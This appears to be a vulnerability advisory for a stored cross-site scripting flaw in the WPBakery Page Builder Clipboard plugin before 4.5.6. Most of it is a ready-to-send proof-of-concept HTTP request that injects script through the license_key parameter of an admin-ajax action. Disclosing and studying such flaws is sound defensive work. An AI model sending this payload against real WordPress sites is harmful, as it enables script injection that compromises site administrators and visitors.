WPBakery Page Builder Clipboard < 4.5.6 - Subscriber+ Stored Cross-Site Scripting (XSS)

When logged in as a user with Subcriber role or greater, submit a request to wp-admin/admin-ajax.php with action = "vc_clipboard_activate" and Javascript can be set in the "email" or "license_key" parameters.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Connection: close
Cookie: [Subscriber+ cookies]

action=vc_clipboard_activate&email=alertfoo&license_key=</script><script>alert(123);</script><script>